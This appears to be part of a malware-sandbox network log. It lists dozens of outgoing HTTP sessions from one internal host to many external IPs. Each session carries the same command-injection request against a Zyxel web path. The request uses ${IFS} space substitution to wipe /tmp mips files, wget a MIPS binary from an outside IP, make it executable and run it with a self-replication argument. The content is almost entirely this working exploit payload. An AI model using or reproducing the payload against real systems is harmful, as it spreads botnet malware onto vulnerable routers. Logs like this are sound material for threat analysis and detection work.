                                          Jan 14, 2024 15:46:00.697663069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          494192.168.2.2348612184.14.242.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697685003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          495192.168.2.234193046.3.105.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697700024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          496192.168.2.2334518150.65.13.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697722912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          497192.168.2.2348096153.170.181.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697746992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          498192.168.2.2351378212.121.100.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697765112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          499192.168.2.2339436222.242.126.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697765112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          500192.168.2.234053067.80.80.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697845936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          501192.168.2.2360166155.198.125.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697853088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          502192.168.2.2358884123.87.196.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697869062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          503192.168.2.234996625.233.121.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697881937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          504192.168.2.2335638201.161.201.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697884083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          505192.168.2.2357354109.251.218.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697946072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          506192.168.2.2357570133.136.251.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697962046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          507192.168.2.2353444205.53.26.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697962046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          508192.168.2.2354214174.30.67.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698009014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          509192.168.2.2337356122.100.129.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698012114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          510192.168.2.234573044.56.232.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698035955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          511192.168.2.2338364142.223.56.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698071003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          512192.168.2.2337526205.169.191.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698101044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          513192.168.2.2357844142.82.47.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698124886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          514192.168.2.2350250164.127.65.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698159933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          515192.168.2.233974662.246.63.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698209047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          516192.168.2.235040282.11.18.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698220968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          517192.168.2.2358098198.216.55.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698221922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          518192.168.2.235531467.173.205.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698237896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          519192.168.2.234253662.96.10.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698263884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          520192.168.2.234643696.112.186.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698286057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          521192.168.2.2360262130.68.195.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698313951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          522192.168.2.2353828149.241.81.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698345900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          523192.168.2.2346206141.91.149.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698363066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          524192.168.2.235826453.29.80.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698405027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          525192.168.2.235680232.125.200.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698425055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          526192.168.2.235002253.15.198.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698452950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          527192.168.2.2355872139.181.211.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698470116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          528192.168.2.233700835.87.152.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698483944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          529192.168.2.2349762142.5.11.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698529005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          530192.168.2.234725462.198.111.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698545933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          531192.168.2.233847846.185.235.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698561907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          532192.168.2.234220214.82.69.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698601007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          533192.168.2.233682261.181.216.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698630095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          534192.168.2.235559662.89.254.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698632956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          535192.168.2.234327660.48.10.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698668957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          536192.168.2.2346670188.208.31.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698719978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          537192.168.2.2333938182.235.212.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698724031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          538192.168.2.2348758196.33.247.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698748112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          539192.168.2.2352828156.91.34.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698795080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          540192.168.2.2358172141.184.212.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698806047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          541192.168.2.2359378188.151.55.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698801041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          542192.168.2.2342338141.12.132.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698849916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          543192.168.2.2334714162.8.113.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698889971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          544192.168.2.2343874186.150.51.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698896885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          545192.168.2.2355402105.110.1.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698935986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          546192.168.2.2342112101.11.41.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698973894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          547192.168.2.2354416155.83.157.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.698990107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          548192.168.2.2334202218.119.106.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699044943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          549192.168.2.2341546202.168.182.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699071884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          550192.168.2.234905425.215.80.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699091911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          551192.168.2.2341594178.144.226.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699120998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          552192.168.2.2347866162.136.193.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699125051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          553192.168.2.2354996116.254.216.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699148893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          554192.168.2.235604268.42.132.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699181080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          555192.168.2.234801060.227.23.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.699213028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          556192.168.2.2352030123.50.223.113443
                                          TimestampBytes transferredDirectionData
